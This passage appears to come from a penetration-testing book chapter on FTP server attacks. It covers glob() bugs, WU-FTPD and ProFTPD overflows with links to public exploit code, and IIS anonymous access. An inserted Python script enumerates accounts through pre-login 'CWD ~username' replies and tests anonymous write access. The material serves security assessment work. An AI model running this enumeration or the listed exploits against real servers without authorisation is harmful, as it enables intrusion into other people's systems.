8.6 FTP Process Manipulation Attacks

If an attacker can accurately identify the target FTP service, together
with the operating platform and architecture of the server it runs on,
it is relatively straightforward to select and launch process-manipulation
attacks that gain access to the server.

Most serious remote buffer overflows in FTP services are
post-authentication issues; they require authenticated access to the
FTP service and its underlying commands. Increasingly, write access
is also required, because exploitation depends on creating complex
directory structures on the server.

8.6.1 Solaris and BSD FTP Globbing Issues

The following glob( ) bug is present in default Solaris installations
up to and including Solaris 8. By issuing a series of CWD ~username
requests, an attacker can enumerate valid user accounts without even
logging into the FTP server, because the server reports whether the
~username path can be expanded before it checks that the session is
authenticated. This issue is described in detail at http://www.iss.net/security_center/static/6332.php
and demonstrated in Example 8-6.

In the example, the blah and test users don't exist, but
chris does. A similar post-authentication glob( ) bug can be
exploited to cause a heap overflow. Example 8-7 details how local
users can easily abuse this vulnerability to produce a core dump
containing the hashed user passwords from the /etc/shadow file.
These two issues are referenced within the MITRE CVE list as
CVE-2001-0421.

No public pre-authentication exploits have been released that
compromise Solaris hosts by abusing glob( ) issues. In theory the
service can be exploited under Solaris if write access to the
filesystem is permitted through FTP (see CVE-2001-0249), although
this is difficult to achieve in practice.

The glob( ) function called by the FTP daemon is also vulnerable
under BSD-derived systems (NetBSD, OpenBSD, and FreeBSD) because of
the way heap memory is managed. An exploit script for this issue is
available at http://www.phreak.org/archives/exploits/unix/ftpd-exploits/turkey2.c.

8.6.2 WU-FTPD Vulnerabilities

WU-FTPD is a popular and easy-to-manage FTP service that many system
administrators run across multiple Unix-like platforms (primarily
Linux). Here, I present a breakdown of recent serious remotely
exploitable vulnerabilities in various versions of WU-FTPD (omitting
denial-of-service and locally exploitable issues), with details of
working exploit scripts. For the latest details of bugs in this
software, be sure to check the MITRE CVE and ISS X-Force databases at
http://cve.mitre.org and http://xforce.iss.net, respectively.

WU-FTPD 2.4.2 BETA 18

A stack overflow is triggered by creating a complex directory
structure and then issuing a DELE command. An exploit is available
for Linux targets at http://examples.oreilly.com/networksa/tools/w00f.c,
and further information is available at http://xforce.iss.net/xforce/xfdb/1728.

WU-FTPD 2.5.0

This version is exploitable by creating a complex directory structure
and issuing a series of CWD commands, resulting in a stack overflow.
An exploit is available for Linux targets at
http://examples.oreilly.com/networksa/tools/ifafoffuffoffaf.c,
and further information is available at http://xforce.iss.net/xforce/xfdb/3158.

WU-FTPD 2.6.0

This version is exploitable by issuing a crafted SITE EXEC command to
the FTP server, which triggers a format string bug (CVE-2000-0573).
Various scripts exist to exploit this under FreeBSD and various Linux
distributions; a favorite of mine is
http://examples.oreilly.com/networksa/tools/wuftp-god.c.
Background information is available at http://xforce.iss.net/xforce/xfdb/4773.

WU-FTPD 2.6.1

Issuing a series of RNFR and CWD ~{ commands to the FTP service
triggers a heap overflow in the glob( ) function (CVE-2001-0550).
TESO released the excellent 7350wurm exploit script, which
compromises various Linux distributions and is available at
http://examples.oreilly.com/networksa/tools/7350wurm.c.
Further information is available at http://xforce.iss.net/xforce/xfdb/7611.

WU-FTPD 2.6.2

The realpath( ) function within WU-FTPD contains an off-by-one bug,
which can be exploited by issuing a number of FTP commands (including
STOR, RETR, MKD, and RMD). An exploit that compromises various Linux
distributions is available at http://examples.oreilly.com/networksa/tools/0x82-wu262.c.
Check MITRE CVE at http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0466
for information, because the ISS X-Force web site didn't list any
details for this issue at the time of writing.

8.6.2.1 Exploiting WU-FTPD 2.6.1 on Linux with 7350wurm

The 7350wurm exploit can root most Linux WU-FTPD services through its
built-in list of targets. Usage of the tool is shown in Example 8-8.

8.6.3 ProFTPD Vulnerabilities

ProFTPD is similar to WU-FTPD in that it runs on multiple operating
platforms. I often see ProFTPD running on FreeBSD and Slackware Linux
in the wild. Table 8-3 lists the recent serious remotely exploitable
issues in ProFTPD that were listed in the MITRE CVE at the time of
writing.

Public exploit code for two of the CVE candidate references listed in
Table 8-3 can be found in the Packet Storm
archives.

Exploits for CAN-1999-0911 (the MKD and CWD stack overflow) can be
found at the following locations:

http://packetstormsecurity.org/groups/teso/pro.tar.gz

http://packetstormsecurity.org/advisories/b0f/proftpd.c

http://packetstormsecurity.org/0007-exploits/proftpX.c

An exploit for CAN-2003-0831 (the ASCII transfer mode newline
character overflow) can be found at http://packetstormsecurity.org/0310-exploits/proftpdr00t.c.

8.6.4 Microsoft IIS FTP Server

At the time of writing, the only serious vulnerabilities threatening
Microsoft IIS FTP services are denial-of-service issues, usually
exploitable only through an authenticated FTP session. Two further
remotely exploitable security issues in the IIS 4.0 and 5.0 FTP
services are listed within MITRE CVE as CVE-2001-0335 and
CVE-1999-0777; both are medium-risk issues relating to information
leakage from the service.

A common oversight is for system administrators to set up
Internet-based IIS FTP servers and leave anonymous guest access to
the server enabled. I have seen such open servers used as public
storage and distribution centers for pirated software and other
material.
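As an added example (not from the original text, nor from any of the tools it references), the following Python script implements two of the checks this section describes: the pre-authentication CWD ~username enumeration of Section 8.6.1, done as a response differential rather than by matching one server's wording, and a test of whether an anonymous account can log in and write, which is the oversight described above and the write-access precondition noted at the start of 8.6. The stub FTP server it talks to is a constructed stand-in whose reply strings are assumed, not captured from a real Solaris or IIS daemon; the two client functions are written against ftplib and can be pointed at a real host and port.

```python
import random
import socket
import string
import threading
from ftplib import FTP, error_perm


class StubFTPServer(threading.Thread):
    """Constructed stand-in (an assumption, not a real Solaris or IIS daemon) for
    the pre-login "CWD ~name" leak and an optional anonymous account; the reply
    strings are invented for this example, not captured traffic."""
    def __init__(self, users=("chris",), anonymous=True, writable=True):
        super().__init__(daemon=True)
        # existing accounts / anonymous login allowed? / anonymous may MKD?
        self.users, self.anonymous, self.writable = set(users), anonymous, writable
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))   # loopback only, ephemeral port
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]

    def run(self):
        while True:
            conn, _ = self.sock.accept()
            threading.Thread(target=self.session, args=(conn,), daemon=True).start()

    def session(self, conn):
        rd, wr = conn.makefile("rb"), conn.makefile("wb")
        def reply(text):
            wr.write(text.encode() + b"\r\n")
            wr.flush()
        reply("220 stub FTP server ready.")
        user, logged_in = None, False
        for raw in rd:
            cmd, _, arg = raw.decode(errors="replace").rstrip("\r\n").partition(" ")
            cmd = cmd.upper()
            if cmd == "QUIT":
                reply("221 Goodbye.")
                break
            elif cmd == "USER":
                user = arg
                reply(f"331 Password required for {arg}.")
            elif cmd == "PASS":
                logged_in = user == "anonymous" and self.anonymous
                reply("230 Login successful." if logged_in else "530 Login incorrect.")
            elif (cmd == "CWD" and not logged_in and arg.startswith("~")
                  and arg[1:] not in self.users):
                # The leak: "~name" is expanded before the login state is checked,
                # so a bogus name gets a different reply from a real one (below).
                reply("550 Unknown user name after ~")
            elif cmd in ("MKD", "RMD") and logged_in and self.writable:
                reply(f'257 "{arg}" directory created.' if cmd == "MKD"
                      else "250 Directory removed.")
            else:
                reply("550 Permission denied." if logged_in
                      else "530 Please login with USER and PASS.")
        conn.close()


def _probe(ftp, name):
    """CWD ~name, returning the reply with the name masked so echoes compare equal."""
    try:
        resp = ftp.sendcmd(f"CWD ~{name}")
    except error_perm as exc:              # ftplib raises on 5xx; keep the text
        resp = str(exc)
    return resp.replace(name, "<name>")


def enumerate_users(host, port, candidates):
    """Pre-authentication enumeration through CWD ~username: the reply for a random
    name that cannot exist is the baseline, and any candidate whose masked reply
    differs from it is reported as a valid account."""
    ftp = FTP()
    ftp.connect(host, port, timeout=10)
    baseline = _probe(ftp, "".join(random.choices(string.ascii_lowercase, k=16)))
    found = [name for name in candidates if _probe(ftp, name) != baseline]
    ftp.quit()
    return found


def check_anonymous_write(host, port):
    """Can anonymous log in, and can it create a directory?  Writable anonymous
    access is what the complex-directory overflows above depend on."""
    ftp = FTP()
    ftp.connect(host, port, timeout=10)
    result = {"anonymous_login": False, "writable": False}
    try:
        ftp.login("anonymous", "probe@example.com")
        result["anonymous_login"] = True
        probe = "probe-" + "".join(random.choices("0123456789abcdef", k=8))
        ftp.mkd(probe)
        result["writable"] = True
        ftp.rmd(probe)                     # leave nothing behind on the target
    except error_perm:                     # 530 on login or 550 on MKD
        pass
    ftp.quit()
    return result


if __name__ == "__main__":
    srv = StubFTPServer(users=("chris",), anonymous=True, writable=True)
    srv.start()
    print(enumerate_users("127.0.0.1", srv.port, ["blah", "test", "chris"]))
    print(check_anonymous_write("127.0.0.1", srv.port))
```

Against a real target, call the two functions with its host and port and any wordlist. The baseline is taken from a random name on every run rather than hard-coded, so a server that answers every pre-login CWD identically simply yields no accounts instead of false positives, and masking the probed name out of each reply keeps servers that echo the argument comparable. The MKD probe is removed again, but it still leaves an entry in the server log, so run it only with authorization.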